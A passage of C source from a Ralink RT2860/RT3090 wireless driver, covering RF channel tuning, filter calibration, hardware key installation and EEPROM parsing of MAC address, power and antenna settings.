if (chan > 14) { if (txpow1 >= 0) txpow1 = txpow1 << 1 | 1; else txpow1 = (7 + txpow1) << 1; if (txpow2 >= 0) txpow2 = txpow2 << 1 | 1; else txpow2 = (7 + txpow2) << 1; } r3 = rfprog[i].r3 | txpow1 << 7; r4 = rfprog[i].r4 | sc->freq << 13 | txpow2 << 4; rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3); rt2860_rf_write(sc, RT2860_RF4, r4); DELAY(200); rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3 | 1); rt2860_rf_write(sc, RT2860_RF4, r4); DELAY(200); rt2860_rf_write(sc, RT2860_RF1, rfprog[i].r1); rt2860_rf_write(sc, RT2860_RF2, r2); rt2860_rf_write(sc, RT2860_RF3, r3); rt2860_rf_write(sc, RT2860_RF4, r4); } static void rt3090_set_chan(struct rt2860_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* RT3090 is 2GHz only */ KASSERT(chan >= 1 && chan <= 14, ("chan %d not support", chan)); /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; rt3090_rf_write(sc, 2, rt3090_freqs[i].n); rf = rt3090_rf_read(sc, 3); rf = (rf & ~0x0f) | rt3090_freqs[i].k; 
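/* N was written to RF register 2 above; K occupies the low nibble of register 3 and R the low two bits of register 6 below, all taken from rt3090_freqs[] */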
rt3090_rf_write(sc, 3, rf); rf = rt3090_rf_read(sc, 6); rf = (rf & ~0x03) | rt3090_freqs[i].r; rt3090_rf_write(sc, 6, rf); /* set Tx0 power */ rf = rt3090_rf_read(sc, 12); rf = (rf & ~0x1f) | txpow1; rt3090_rf_write(sc, 12, rf); /* set Tx1 power */ rf = rt3090_rf_read(sc, 13); rf = (rf & ~0x1f) | txpow2; rt3090_rf_write(sc, 13, rf); rf = rt3090_rf_read(sc, 1); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= RT3070_TX1_PD | RT3070_TX2_PD; else if (sc->ntxchains == 2) rf |= RT3070_TX2_PD; if (sc->nrxchains == 1) rf |= RT3070_RX1_PD | RT3070_RX2_PD; else if (sc->nrxchains == 2) rf |= RT3070_RX2_PD; rt3090_rf_write(sc, 1, rf); /* set RF offset */ rf = rt3090_rf_read(sc, 23); rf = (rf & ~0x7f) | sc->freq; rt3090_rf_write(sc, 23, rf); /* program RF filter */ rf = rt3090_rf_read(sc, 24); /* Tx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; rt3090_rf_write(sc, 24, rf); rf = rt3090_rf_read(sc, 31); /* Rx */ rf = (rf & ~0x3f) | sc->rf24_20mhz; rt3090_rf_write(sc, 31, rf); /* enable RF tuning */ rf = rt3090_rf_read(sc, 7); rt3090_rf_write(sc, 7, rf | RT3070_TUNE); } static int rt3090_rf_init(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) uint32_t tmp; uint8_t rf, bbp; int i; rf = rt3090_rf_read(sc, 30); /* toggle RF R30 bit 7 */ rt3090_rf_write(sc, 30, rf | 0x80); DELAY(1000); rt3090_rf_write(sc, 30, rf & ~0x80); tmp = RAL_READ(sc, RT3070_LDO_CFG0); tmp &= ~0x1f000000; if (sc->patch_dac && sc->mac_rev < 0x0211) tmp |= 0x0d000000; /* 1.35V */ else tmp |= 0x01000000; /* 1.2V */ RAL_WRITE(sc, RT3070_LDO_CFG0, tmp); /* patch LNA_PE_G1 */ tmp = RAL_READ(sc, RT3070_GPIO_SWITCH); RAL_WRITE(sc, RT3070_GPIO_SWITCH, tmp & ~0x20); /* initialize RF registers to default value */ for (i = 0; i < N(rt3090_def_rf); i++) { rt3090_rf_write(sc, rt3090_def_rf[i].reg, rt3090_def_rf[i].val); } /* select 20MHz bandwidth */ rt3090_rf_write(sc, 31, 0x14); rf = rt3090_rf_read(sc, 6); rt3090_rf_write(sc, 6, rf | 0x40); if (sc->mac_ver != 0x3593) { /* calibrate filter for 20MHz bandwidth */ sc->rf24_20mhz = 0x1f; /* default value */ rt3090_filter_calib(sc, 0x07, 0x16, &sc->rf24_20mhz); /* select 40MHz bandwidth */ bbp = rt2860_mcu_bbp_read(sc, 4); rt2860_mcu_bbp_write(sc, 4, (bbp & ~0x08) | 0x10); rf = rt3090_rf_read(sc, 31); rt3090_rf_write(sc, 31, rf | 0x20); /* calibrate filter for 40MHz bandwidth */ sc->rf24_40mhz = 0x2f; /* default value */ rt3090_filter_calib(sc, 0x27, 0x19, &sc->rf24_40mhz); /* go back to 20MHz bandwidth */ bbp = rt2860_mcu_bbp_read(sc, 4); rt2860_mcu_bbp_write(sc, 4, bbp & ~0x18); } if (sc->mac_rev < 0x0211) rt3090_rf_write(sc, 27, 0x03); tmp = RAL_READ(sc, RT3070_OPT_14); RAL_WRITE(sc, RT3070_OPT_14, tmp | 1); if (sc->rf_rev == RT3070_RF_3020) rt3090_set_rx_antenna(sc, 0); bbp = rt2860_mcu_bbp_read(sc, 138); if (sc->mac_ver == 0x3593) { if (sc->ntxchains == 1) bbp |= 0x60; /* turn off DAC1 and DAC2 */ else if (sc->ntxchains == 2) bbp |= 0x40; /* turn off DAC2 */ if (sc->nrxchains == 1) bbp &= ~0x06; /* turn off ADC1 and ADC2 */ else if (sc->nrxchains == 2) bbp &= ~0x04; /* turn off ADC2 */ } else { if (sc->ntxchains == 1) bbp |= 0x20; /* turn off DAC1 */ if (sc->nrxchains == 1) bbp &= ~0x02; /* turn off ADC1 */ } rt2860_mcu_bbp_write(sc, 138, bbp); rf = rt3090_rf_read(sc, 1); rf &= ~(RT3070_RX0_PD | RT3070_TX0_PD); rf |= RT3070_RF_BLOCK | RT3070_RX1_PD | RT3070_TX1_PD; rt3090_rf_write(sc, 1, rf); rf = rt3090_rf_read(sc, 15); rt3090_rf_write(sc, 15, rf & ~RT3070_TX_LO2); rf = rt3090_rf_read(sc, 17); rf &= ~RT3070_TX_LO1; if (sc->mac_rev >= 0x0211 && !sc->ext_2ghz_lna) rf |= 0x20; /* fix for 
long range Rx issue */ if (sc->txmixgain_2ghz >= 2) rf = (rf & ~0x7) | sc->txmixgain_2ghz; rt3090_rf_write(sc, 17, rf); rf = rt3090_rf_read(sc, 20); rt3090_rf_write(sc, 20, rf & ~RT3070_RX_LO1); rf = rt3090_rf_read(sc, 21); rt3090_rf_write(sc, 21, rf & ~RT3070_RX_LO2); return 0; #undef N } void rt3090_rf_wakeup(struct rt2860_softc *sc) { uint32_t tmp; uint8_t rf; if (sc->mac_ver == 0x3593) { /* enable VCO */ rf = rt3090_rf_read(sc, 1); rt3090_rf_write(sc, 1, rf | RT3593_VCO); /* initiate VCO calibration */ rf = rt3090_rf_read(sc, 3); rt3090_rf_write(sc, 3, rf | RT3593_VCOCAL); /* enable VCO bias current control */ rf = rt3090_rf_read(sc, 6); rt3090_rf_write(sc, 6, rf | RT3593_VCO_IC); /* initiate res calibration */ rf = rt3090_rf_read(sc, 2); rt3090_rf_write(sc, 2, rf | RT3593_RESCAL); /* set reference current control to 0.33 mA */ rf = rt3090_rf_read(sc, 22); rf &= ~RT3593_CP_IC_MASK; rf |= 1 << RT3593_CP_IC_SHIFT; rt3090_rf_write(sc, 22, rf); /* enable RX CTB */ rf = rt3090_rf_read(sc, 46); rt3090_rf_write(sc, 46, rf | RT3593_RX_CTB); rf = rt3090_rf_read(sc, 20); rf &= ~(RT3593_LDO_RF_VC_MASK | RT3593_LDO_PLL_VC_MASK); rt3090_rf_write(sc, 20, rf); } else { /* enable RF block */ rf = rt3090_rf_read(sc, 1); rt3090_rf_write(sc, 1, rf | RT3070_RF_BLOCK); /* enable VCO bias current control */ rf = rt3090_rf_read(sc, 7); rt3090_rf_write(sc, 7, rf | 0x30); rf = rt3090_rf_read(sc, 9); rt3090_rf_write(sc, 9, rf | 0x0e); /* enable RX CTB */ rf = rt3090_rf_read(sc, 21); rt3090_rf_write(sc, 21, rf | RT3070_RX_CTB); /* fix Tx to Rx IQ glitch by raising RF voltage */ rf = rt3090_rf_read(sc, 27); rf &= ~0x77; if (sc->mac_rev < 0x0211) rf |= 0x03; rt3090_rf_write(sc, 27, rf); } if (sc->patch_dac && sc->mac_rev < 0x0211) { tmp = RAL_READ(sc, RT3070_LDO_CFG0); tmp = (tmp & ~0x1f000000) | 0x0d000000; RAL_WRITE(sc, RT3070_LDO_CFG0, tmp); } } int rt3090_filter_calib(struct rt2860_softc *sc, uint8_t init, uint8_t target, uint8_t *val) { uint8_t rf22, rf24; uint8_t bbp55_pb, bbp55_sb, delta; int ntries; /* program filter */ rf24 = rt3090_rf_read(sc, 24); rf24 = (rf24 & 0xc0) | init; /* initial filter value */ rt3090_rf_write(sc, 24, rf24); /* enable baseband loopback mode */ rf22 = rt3090_rf_read(sc, 22); rt3090_rf_write(sc, 22, rf22 | RT3070_BB_LOOPBACK); /* set power and frequency of passband test tone */ rt2860_mcu_bbp_write(sc, 24, 0x00); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ rt2860_mcu_bbp_write(sc, 25, 0x90); DELAY(1000); /* read received power */ bbp55_pb = rt2860_mcu_bbp_read(sc, 55); if (bbp55_pb != 0) break; } if (ntries == 100) return ETIMEDOUT; /* set power and frequency of stopband test tone */ rt2860_mcu_bbp_write(sc, 24, 0x06); for (ntries = 0; ntries < 100; ntries++) { /* transmit test tone */ rt2860_mcu_bbp_write(sc, 25, 0x90); DELAY(1000); /* read received power */ bbp55_sb = rt2860_mcu_bbp_read(sc, 55); delta = bbp55_pb - bbp55_sb; if (delta > target) break; /* reprogram filter */ rf24++; rt3090_rf_write(sc, 24, rf24); } if (ntries < 100) { if (rf24 != init) rf24--; /* backtrack */ *val = rf24; rt3090_rf_write(sc, 24, rf24); } /* restore initial state */ rt2860_mcu_bbp_write(sc, 24, 0x00); /* disable baseband loopback mode */ rf22 = rt3090_rf_read(sc, 22); rt3090_rf_write(sc, 22, rf22 & ~RT3070_BB_LOOPBACK); return 0; } static void rt3090_rf_setup(struct rt2860_softc *sc) { uint8_t bbp; int i; if (sc->mac_rev >= 0x0211) { /* enable DC filter */ rt2860_mcu_bbp_write(sc, 103, 0xc0); /* improve power consumption */ bbp = rt2860_mcu_bbp_read(sc, 31); 
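/* read-modify-write: only bits 0-1 of BBP 31 are cleared, the remaining bits are left untouched */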
rt2860_mcu_bbp_write(sc, 31, bbp & ~0x03); } RAL_WRITE(sc, RT2860_TX_SW_CFG1, 0); if (sc->mac_rev < 0x0211) { RAL_WRITE(sc, RT2860_TX_SW_CFG2, sc->patch_dac ? 0x2c : 0x0f); } else RAL_WRITE(sc, RT2860_TX_SW_CFG2, 0); /* initialize RF registers from ROM */ for (i = 0; i < 10; i++) { if (sc->rf[i].reg == 0 || sc->rf[i].reg == 0xff) continue; rt3090_rf_write(sc, sc->rf[i].reg, sc->rf[i].val); } } static void rt2860_set_leds(struct rt2860_softc *sc, uint16_t which) { rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LEDS, which | (sc->leds & 0x7f), 0); } /* * Hardware has a general-purpose programmable timer interrupt that can * periodically raise MAC_INT_4. */ static void rt2860_set_gp_timer(struct rt2860_softc *sc, int ms) { uint32_t tmp; /* disable GP timer before reprogramming it */ tmp = RAL_READ(sc, RT2860_INT_TIMER_EN); RAL_WRITE(sc, RT2860_INT_TIMER_EN, tmp & ~RT2860_GP_TIMER_EN); if (ms == 0) return; tmp = RAL_READ(sc, RT2860_INT_TIMER_CFG); ms *= 16; /* Unit: 64us */ tmp = (tmp & 0xffff) | ms << RT2860_GP_TIMER_SHIFT; RAL_WRITE(sc, RT2860_INT_TIMER_CFG, tmp); /* enable GP timer */ tmp = RAL_READ(sc, RT2860_INT_TIMER_EN); RAL_WRITE(sc, RT2860_INT_TIMER_EN, tmp | RT2860_GP_TIMER_EN); } static void rt2860_set_bssid(struct rt2860_softc *sc, const uint8_t *bssid) { RAL_WRITE(sc, RT2860_MAC_BSSID_DW0, bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24); RAL_WRITE(sc, RT2860_MAC_BSSID_DW1, bssid[4] | bssid[5] << 8); } static void rt2860_set_macaddr(struct rt2860_softc *sc, const uint8_t *addr) { RAL_WRITE(sc, RT2860_MAC_ADDR_DW0, addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24); RAL_WRITE(sc, RT2860_MAC_ADDR_DW1, addr[4] | addr[5] << 8 | 0xff << 16); } static void rt2860_updateslot(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RAL_READ(sc, RT2860_BKOFF_SLOT_CFG); tmp &= ~0xff; tmp |= (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; RAL_WRITE(sc, RT2860_BKOFF_SLOT_CFG, tmp); } static void rt2860_updateprot(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; tmp = RT2860_RTSTH_EN | RT2860_PROT_NAV_SHORT | RT2860_TXOP_ALLOW_ALL; /* setup protection frame rate (MCS code) */ tmp |= IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan) ? 
rt2860_rates[RT2860_RIDX_OFDM6].mcs : rt2860_rates[RT2860_RIDX_CCK11].mcs; /* CCK frames don't require protection */ RAL_WRITE(sc, RT2860_CCK_PROT_CFG, tmp); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) tmp |= RT2860_PROT_CTRL_RTS_CTS; else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) tmp |= RT2860_PROT_CTRL_CTS; } RAL_WRITE(sc, RT2860_OFDM_PROT_CFG, tmp); } static void rt2860_update_promisc(struct ifnet *ifp) { struct rt2860_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2860_RX_FILTR_CFG); tmp &= ~RT2860_DROP_NOT_MYBSS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2860_DROP_NOT_MYBSS; RAL_WRITE(sc, RT2860_RX_FILTR_CFG, tmp); } static int rt2860_updateedca(struct ieee80211com *ic) { struct rt2860_softc *sc = ic->ic_ifp->if_softc; const struct wmeParams *wmep; int aci; wmep = ic->ic_wme.wme_chanParams.cap_wmeParams; /* update MAC TX configuration registers */ for (aci = 0; aci < WME_NUM_AC; aci++) { RAL_WRITE(sc, RT2860_EDCA_AC_CFG(aci), wmep[aci].wmep_logcwmax << 16 | wmep[aci].wmep_logcwmin << 12 | wmep[aci].wmep_aifsn << 8 | wmep[aci].wmep_txopLimit); } /* update SCH/DMA registers too */ RAL_WRITE(sc, RT2860_WMM_AIFSN_CFG, wmep[WME_AC_VO].wmep_aifsn << 12 | wmep[WME_AC_VI].wmep_aifsn << 8 | wmep[WME_AC_BK].wmep_aifsn << 4 | wmep[WME_AC_BE].wmep_aifsn); RAL_WRITE(sc, RT2860_WMM_CWMIN_CFG, wmep[WME_AC_VO].wmep_logcwmin << 12 | wmep[WME_AC_VI].wmep_logcwmin << 8 | wmep[WME_AC_BK].wmep_logcwmin << 4 | wmep[WME_AC_BE].wmep_logcwmin); RAL_WRITE(sc, RT2860_WMM_CWMAX_CFG, wmep[WME_AC_VO].wmep_logcwmax << 12 | wmep[WME_AC_VI].wmep_logcwmax << 8 | wmep[WME_AC_BK].wmep_logcwmax << 4 | wmep[WME_AC_BE].wmep_logcwmax); RAL_WRITE(sc, RT2860_WMM_TXOP0_CFG, wmep[WME_AC_BK].wmep_txopLimit << 16 | wmep[WME_AC_BE].wmep_txopLimit); RAL_WRITE(sc, RT2860_WMM_TXOP1_CFG, wmep[WME_AC_VO].wmep_txopLimit << 16 | wmep[WME_AC_VI].wmep_txopLimit); return 0; } #ifdef HW_CRYPTO static int rt2860_set_key(struct ieee80211com *ic, struct ieee80211_node *ni, struct ieee80211_key *k) { struct rt2860_softc *sc = ic->ic_softc; bus_size_t base; uint32_t attr; uint8_t mode, wcid, iv[8]; /* defer setting of WEP keys until interface is brought up */ if ((ic->ic_if.if_flags & (IFF_UP | IFF_RUNNING)) != (IFF_UP | IFF_RUNNING)) return 0; /* map net80211 cipher to RT2860 security mode */ switch (k->k_cipher) { case IEEE80211_CIPHER_WEP40: mode = RT2860_MODE_WEP40; break; case IEEE80211_CIPHER_WEP104: mode = RT2860_MODE_WEP104; break; case IEEE80211_CIPHER_TKIP: mode = RT2860_MODE_TKIP; break; case IEEE80211_CIPHER_CCMP: mode = RT2860_MODE_AES_CCMP; break; default: return EINVAL; } if (k->k_flags & IEEE80211_KEY_GROUP) { wcid = 0; /* NB: update WCID0 for group keys */ base = RT2860_SKEY(0, k->k_id); } else { wcid = ((struct rt2860_node *)ni)->wcid; base = RT2860_PKEY(wcid); } if (k->k_cipher == IEEE80211_CIPHER_TKIP) { RAL_WRITE_REGION_1(sc, base, k->k_key, 16); #ifndef IEEE80211_STA_ONLY if (ic->ic_opmode == IEEE80211_M_HOSTAP) { RAL_WRITE_REGION_1(sc, base + 16, &k->k_key[16], 8); RAL_WRITE_REGION_1(sc, base + 24, &k->k_key[24], 8); } else #endif { RAL_WRITE_REGION_1(sc, base + 16, &k->k_key[24], 8); RAL_WRITE_REGION_1(sc, base + 24, &k->k_key[16], 8); } } else RAL_WRITE_REGION_1(sc, base, k->k_key, k->k_len); if (!(k->k_flags & IEEE80211_KEY_GROUP) || (k->k_flags & IEEE80211_KEY_TX)) { /* set initial packet number in IV+EIV */ if (k->k_cipher == IEEE80211_CIPHER_WEP40 || k->k_cipher == IEEE80211_CIPHER_WEP104) { uint32_t val = arc4random(); /* skip weak IVs from 
Fluhrer/Mantin/Shamir */ if (val >= 0x03ff00 && (val & 0xf8ff00) == 0x00ff00) val += 0x000100; iv[0] = val; iv[1] = val >> 8; iv[2] = val >> 16; iv[3] = k->k_id << 6; iv[4] = iv[5] = iv[6] = iv[7] = 0; } else { if (k->k_cipher == IEEE80211_CIPHER_TKIP) { iv[0] = k->k_tsc >> 8; iv[1] = (iv[0] | 0x20) & 0x7f; iv[2] = k->k_tsc; } else /* CCMP */ { iv[0] = k->k_tsc; iv[1] = k->k_tsc >> 8; iv[2] = 0; } iv[3] = k->k_id << 6 | IEEE80211_WEP_EXTIV; iv[4] = k->k_tsc >> 16; iv[5] = k->k_tsc >> 24; iv[6] = k->k_tsc >> 32; iv[7] = k->k_tsc >> 40; } RAL_WRITE_REGION_1(sc, RT2860_IVEIV(wcid), iv, 8); } if (k->k_flags & IEEE80211_KEY_GROUP) { /* install group key */ attr = RAL_READ(sc, RT2860_SKEY_MODE_0_7); attr &= ~(0xf << (k->k_id * 4)); attr |= mode << (k->k_id * 4); RAL_WRITE(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* install pairwise key */ attr = RAL_READ(sc, RT2860_WCID_ATTR(wcid)); attr = (attr & ~0xf) | (mode << 1) | RT2860_RX_PKEY_EN; RAL_WRITE(sc, RT2860_WCID_ATTR(wcid), attr); } return 0; } static void rt2860_delete_key(struct ieee80211com *ic, struct ieee80211_node *ni, struct ieee80211_key *k) { struct rt2860_softc *sc = ic->ic_softc; uint32_t attr; uint8_t wcid; if (k->k_flags & IEEE80211_KEY_GROUP) { /* remove group key */ attr = RAL_READ(sc, RT2860_SKEY_MODE_0_7); attr &= ~(0xf << (k->k_id * 4)); RAL_WRITE(sc, RT2860_SKEY_MODE_0_7, attr); } else { /* remove pairwise key */ wcid = ((struct rt2860_node *)ni)->wcid; attr = RAL_READ(sc, RT2860_WCID_ATTR(wcid)); attr &= ~0xf; RAL_WRITE(sc, RT2860_WCID_ATTR(wcid), attr); } } #endif static int8_t rt2860_rssi2dbm(struct rt2860_softc *sc, uint8_t rssi, uint8_t rxchain) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c = ic->ic_curchan; int delta; if (IEEE80211_IS_CHAN_5GHZ(c)) { u_int chan = ieee80211_chan2ieee(ic, c); delta = sc->rssi_5ghz[rxchain]; /* determine channel group */ if (chan <= 64) delta -= sc->lna[1]; else if (chan <= 128) delta -= sc->lna[2]; else delta -= sc->lna[3]; } else delta = sc->rssi_2ghz[rxchain] - sc->lna[0]; return -12 - delta - rssi; } /* * Add `delta' (signed) to each 4-bit sub-word of a 32-bit word. * Used to adjust per-rate Tx power registers. 
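* For example, b4inc(0x1f2f3f4f, +1) yields 0x2f3f4f5f; each field saturates at 0x0 and 0xf.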
*/ static __inline uint32_t b4inc(uint32_t b32, int8_t delta) { int8_t i, b4; for (i = 0; i < 8; i++) { b4 = b32 & 0xf; b4 += delta; if (b4 < 0) b4 = 0; else if (b4 > 0xf) b4 = 0xf; b32 = b32 >> 4 | b4 << 28; } return b32; } static const char * rt2860_get_rf(uint8_t rev) { switch (rev) { case RT2860_RF_2820: return "RT2820"; case RT2860_RF_2850: return "RT2850"; case RT2860_RF_2720: return "RT2720"; case RT2860_RF_2750: return "RT2750"; case RT3070_RF_3020: return "RT3020"; case RT3070_RF_2020: return "RT2020"; case RT3070_RF_3021: return "RT3021"; case RT3070_RF_3022: return "RT3022"; case RT3070_RF_3052: return "RT3052"; case RT3070_RF_3320: return "RT3320"; case RT3070_RF_3053: return "RT3053"; default: return "unknown"; } } static int rt2860_read_eeprom(struct rt2860_softc *sc, uint8_t macaddr[IEEE80211_ADDR_LEN]) { int8_t delta_2ghz, delta_5ghz; uint32_t tmp; uint16_t val; int ridx, ant, i; /* check whether the ROM is eFUSE ROM or EEPROM */ sc->sc_srom_read = rt2860_eeprom_read_2; if (sc->mac_ver >= 0x3071) { tmp = RAL_READ(sc, RT3070_EFUSE_CTRL); DPRINTF(("EFUSE_CTRL=0x%08x\n", tmp)); if (tmp & RT3070_SEL_EFUSE) sc->sc_srom_read = rt3090_efuse_read_2; } /* read EEPROM version */ val = rt2860_srom_read(sc, RT2860_EEPROM_VERSION); DPRINTF(("EEPROM rev=%d, FAE=%d\n", val & 0xff, val >> 8)); /* read MAC address */ val = rt2860_srom_read(sc, RT2860_EEPROM_MAC01); macaddr[0] = val & 0xff; macaddr[1] = val >> 8; val = rt2860_srom_read(sc, RT2860_EEPROM_MAC23); macaddr[2] = val & 0xff; macaddr[3] = val >> 8; val = rt2860_srom_read(sc, RT2860_EEPROM_MAC45); macaddr[4] = val & 0xff; macaddr[5] = val >> 8; /* read country code */ val = rt2860_srom_read(sc, RT2860_EEPROM_COUNTRY); DPRINTF(("EEPROM region code=0x%04x\n", val)); /* read vendor BBP settings */ for (i = 0; i < 8; i++) { val = rt2860_srom_read(sc, RT2860_EEPROM_BBP_BASE + i); sc->bbp[i].val = val & 0xff; sc->bbp[i].reg = val >> 8; DPRINTF(("BBP%d=0x%02x\n", sc->bbp[i].reg, sc->bbp[i].val)); } if (sc->mac_ver >= 0x3071) { /* read vendor RF settings */ for (i = 0; i < 10; i++) { val = rt2860_srom_read(sc, RT3071_EEPROM_RF_BASE + i); sc->rf[i].val = val & 0xff; sc->rf[i].reg = val >> 8; DPRINTF(("RF%d=0x%02x\n", sc->rf[i].reg, sc->rf[i].val)); } } /* read RF frequency offset from EEPROM */ val = rt2860_srom_read(sc, RT2860_EEPROM_FREQ_LEDS); sc->freq = ((val & 0xff) != 0xff) ? 
val & 0xff : 0; DPRINTF(("EEPROM freq offset %d\n", sc->freq & 0xff)); if ((val >> 8) != 0xff) { /* read LEDs operating mode */ sc->leds = val >> 8; sc->led[0] = rt2860_srom_read(sc, RT2860_EEPROM_LED1); sc->led[1] = rt2860_srom_read(sc, RT2860_EEPROM_LED2); sc->led[2] = rt2860_srom_read(sc, RT2860_EEPROM_LED3); } else { /* broken EEPROM, use default settings */ sc->leds = 0x01; sc->led[0] = 0x5555; sc->led[1] = 0x2221; sc->led[2] = 0xa9f8; } DPRINTF(("EEPROM LED mode=0x%02x, LEDs=0x%04x/0x%04x/0x%04x\n", sc->leds, sc->led[0], sc->led[1], sc->led[2])); /* read RF information */ val = rt2860_srom_read(sc, RT2860_EEPROM_ANTENNA); if (val == 0xffff) { DPRINTF(("invalid EEPROM antenna info, using default\n")); if (sc->mac_ver == 0x3593) { /* default to RF3053 3T3R */ sc->rf_rev = RT3070_RF_3053; sc->ntxchains = 3; sc->nrxchains = 3; } else if (sc->mac_ver >= 0x3071) { /* default to RF3020 1T1R */ sc->rf_rev = RT3070_RF_3020; sc->ntxchains = 1; sc->nrxchains = 1; } else { /* default to RF2820 1T2R */ sc->rf_rev = RT2860_RF_2820; sc->ntxchains = 1; sc->nrxchains = 2; } } else { sc->rf_rev = (val >> 8) & 0xf; sc->ntxchains = (val >> 4) & 0xf; sc->nrxchains = val & 0xf; } DPRINTF(("EEPROM RF rev=0x%02x chains=%dT%dR\n", sc->rf_rev, sc->ntxchains, sc->nrxchains)); /* check if RF supports automatic Tx access gain control */ val = rt2860_srom_read(sc, RT2860_EEPROM_CONFIG); DPRINTF(("EEPROM CFG 0x%04x\n", val)); /* check if driver should patch the DAC issue */ if ((val >> 8) != 0xff) sc->patch_dac = (val >> 15) & 1; if ((val & 0xff) != 0xff) { sc->ext_5ghz_lna = (val >> 3) & 1; sc->ext_2ghz_lna = (val >> 2) & 1; /* check if RF supports automatic Tx access gain control */ sc->calib_2ghz = sc->calib_5ghz = 0; /* XXX (val >> 1) & 1 */; /* check if we have a hardware radio switch */ sc->rfswitch = val & 1; } if (sc->sc_flags & RT2860_ADVANCED_PS) { /* read PCIe power save level */ val = rt2860_srom_read(sc, RT2860_EEPROM_PCIE_PSLEVEL); if ((val & 0xff) != 0xff) { sc->pslevel = val & 0x3; val = rt2860_srom_read(sc, RT2860_EEPROM_REV); if ((val & 0xff80) != 0x9280) sc->pslevel = MIN(sc->pslevel, 1); DPRINTF(("EEPROM PCIe PS Level=%d\n", sc->pslevel)); } } /* read power settings for 2GHz channels */ for (i = 0; i < 14; i += 2) { val = rt2860_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE1 + i / 2); sc->txpow1[i + 0] = (int8_t)(val & 0xff); sc->txpow1[i + 1] = (int8_t)(val >> 8); val = rt2860_srom_read(sc, RT2860_EEPROM_PWR2GHZ_BASE2 + i / 2); sc->txpow2[i + 0] = (int8_t)(val & 0xff); sc->txpow2[i + 1] = (int8_t)(val >> 8); } /* fix broken Tx power entries */ for (i = 0; i < 14; i++) { if (sc->txpow1[i] < 0 || sc->txpow1[i] > 31) sc->txpow1[i] = 5; if (sc->txpow2[i] < 0 || sc->txpow2[i] > 31) sc->txpow2[i] = 5; DPRINTF(("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[i].chan, sc->txpow1[i], sc->txpow2[i])); } /* read power settings for 5GHz channels */ for (i = 0; i < 40; i += 2) { val = rt2860_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE1 + i / 2); sc->txpow1[i + 14] = (int8_t)(val & 0xff); sc->txpow1[i + 15] = (int8_t)(val >> 8); val = rt2860_srom_read(sc, RT2860_EEPROM_PWR5GHZ_BASE2 + i / 2); sc->txpow2[i + 14] = (int8_t)(val & 0xff); sc->txpow2[i + 15] = (int8_t)(val >> 8); } /* fix broken Tx power entries */ for (i = 0; i < 40; i++) { if (sc->txpow1[14 + i] < -7 || sc->txpow1[14 + i] > 15) sc->txpow1[14 + i] = 5; if (sc->txpow2[14 + i] < -7 || sc->txpow2[14 + i] > 15) sc->txpow2[14 + i] = 5; DPRINTF(("chan %d: power1=%d, power2=%d\n", rt2860_rf2850[14 + i].chan, sc->txpow1[14 + i], sc->txpow2[14 + i])); } /* 
read Tx power compensation for each Tx rate */ val = rt2860_srom_read(sc, RT2860_EEPROM_DELTAPWR); delta_2ghz = delta_5ghz = 0; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_2ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_2ghz = -delta_2ghz; } val >>= 8; if ((val & 0xff) != 0xff && (val & 0x80)) { delta_5ghz = val & 0xf; if (!(val & 0x40)) /* negative number */ delta_5ghz = -delta_5ghz; } DPRINTF(("power compensation=%d (2GHz), %d (5GHz)\n", delta_2ghz, delta_5ghz)); for (ridx = 0; ridx < 5; ridx++) { uint32_t reg; val = rt2860_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2); reg = val; val = rt2860_srom_read(sc, RT2860_EEPROM_RPWR + ridx * 2 + 1); reg |= (uint32_t)val << 16; sc->txpow20mhz[ridx] = reg; sc->txpow40mhz_2ghz[ridx] = b4inc(reg, delta_2ghz); sc->txpow40mhz_5ghz[ridx] = b4inc(reg, delta_5ghz); DPRINTF(("ridx %d: power 20MHz=0x%08x, 40MHz/2GHz=0x%08x, " "40MHz/5GHz=0x%08x\n", ridx, sc->txpow20mhz[ridx], sc->txpow40mhz_2ghz[ridx], sc->txpow40mhz_5ghz[ridx])); } /* read factory-calibrated samples for temperature compensation */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI1_2GHZ); sc->tssi_2ghz[0] = val & 0xff; /* [-4] */ sc->tssi_2ghz[1] = val >> 8; /* [-3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI2_2GHZ); sc->tssi_2ghz[2] = val & 0xff; /* [-2] */ sc->tssi_2ghz[3] = val >> 8; /* [-1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI3_2GHZ); sc->tssi_2ghz[4] = val & 0xff; /* [+0] */ sc->tssi_2ghz[5] = val >> 8; /* [+1] */ val = rt2860_srom_read(sc, 